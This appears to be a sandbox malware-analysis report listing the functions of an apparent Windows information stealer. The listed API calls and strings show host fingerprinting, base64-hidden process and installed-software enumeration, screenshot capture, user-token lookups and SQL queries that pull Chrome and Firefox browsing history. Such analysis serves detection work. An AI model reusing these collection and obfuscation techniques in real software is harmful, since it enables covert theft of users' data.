Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Layouts: , xrefs: 0041741C
, xrefs: 004172E5, 00417472, 00417490
Zone: , xrefs: 00417462
LocalTime: , xrefs: 0041743F
Windows : , xrefs: 004172F8
[Soft], xrefs: 004174D4
EXE_PATH : , xrefs: 004172D3
Computer(Username) : , xrefs: 00417364
Screen: , xrefs: 004173BD
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19

Function 00417290 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Layouts: , xrefs: 0041741C
, xrefs: 004172E5, 00417472, 00417490
Zone: , xrefs: 00417462
LocalTime: , xrefs: 0041743F
Windows : , xrefs: 004172F8
[Soft], xrefs: 004174D4
EXE_PATH : , xrefs: 004172D3
Computer(Username) : , xrefs: 00417364
Screen: , xrefs: 004173BD
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19

Function 00407DD0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

WTSQueryUserToken, xrefs: 00407E0D
kernel32.dll, xrefs: 00407DFB
CreateEnvironmentBlock, xrefs: 00407E24
wtsapi32.dll, xrefs: 00407E12
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
D, xrefs: 00407E5D
userenv.dll, xrefs: 00407E29

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68

Function 00407DD4 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

WTSQueryUserToken, xrefs: 00407E0D
kernel32.dll, xrefs: 00407DFB
CreateEnvironmentBlock, xrefs: 00407E24
wtsapi32.dll, xrefs: 00407E12
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
D, xrefs: 00407E5D
userenv.dll, xrefs: 00407E29

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58

Function 00416B94 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
a2VybmVsMzIuZGxs, xrefs: 00416C61
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9
kernel32.dll, xrefs: 00416BFF, 00416C2D

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00416B8C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
a2VybmVsMzIuZGxs, xrefs: 00416C61
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9
kernel32.dll, xrefs: 00416BFF, 00416C2D

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00416B90 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
a2VybmVsMzIuZGxs, xrefs: 00416C61
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9
kernel32.dll, xrefs: 00416BFF, 00416C2D

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00415F30 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==, xrefs: 00415FE8, 00416089, 004161AB, 0041624C
RGlzcGxheU5hbWU=, xrefs: 00415FB9, 0041617C
), xrefs: 004160E7, 004162AA
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs, xrefs: 00415F72, 00416135
RGlzcGxheVZlcnNpb24=, xrefs: 0041605A, 0041621D
, xrefs: 0041633A
(), xrefs: 00416304

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: Open$EnumFreeString$QueryValue
String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
API String ID: 811798878-3013244427
Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D

Function 004178B4 Relevance: 18.2, APIs: 12, Instructions: 162COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,00000000,0041B0FC,00000000,?,00419475,00000000,00000001,?,image/jpeg,00000032,00000000,?,?,?), ref: 00417994
73A24C40.GDI32(00000000,00000000,?,00000000,0041B0FC,00000000,?,00419475,00000000,00000001,?,image/jpeg,00000032,00000000,?,?), ref: 0041799D
73A24C00.GDI32(00000000,0041A69E,?,00000000,00000000,?,00000000,0041B0FC,00000000,?,00419475,00000000,00000001,?,image/jpeg,00000032), ref: 004179AD
SelectObject.GDI32(00000000,00000000), ref: 004179B6
73A24D40.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020,00000000,0041A69E,?,00000000,00000000,?,00000000), ref: 004179D6
CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 004179E8
GetHGlobalFromStream.COMBASE(?,?), ref: 00417A76
GlobalLock.KERNEL32(?), ref: 00417A80
GlobalUnlock.KERNEL32(?), ref: 00417AA2
DeleteObject.GDI32(00000000), ref: 00417AA8
DeleteDC.GDI32(00000000), ref: 00417AAE
73A1A480.USER32(00000000,00000000), ref: 00417AB6

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: Global$DeleteObjectStream$A480A570CreateFromLockSelectUnlock
String ID:
API String ID: 2699471203-0
Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58

Function 004129A4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004129E8
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
DeleteFileW.KERNEL32(00000000), ref: 00412C05

Strings

SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
, xrefs: 00412B98
%TEMP%, xrefs: 00412A23
.tmp, xrefs: 00412A03

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
API String ID: 2381671008-351388873
Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58

Function 0041256C Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004125B0
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
DeleteFileW.KERNEL32(00000000), ref: 004127CD

Strings

.tmp, xrefs: 004125CB
SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
%TEMP%, xrefs: 004125EB
, xrefs: 00412760

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
API String ID: 2381671008-462058183
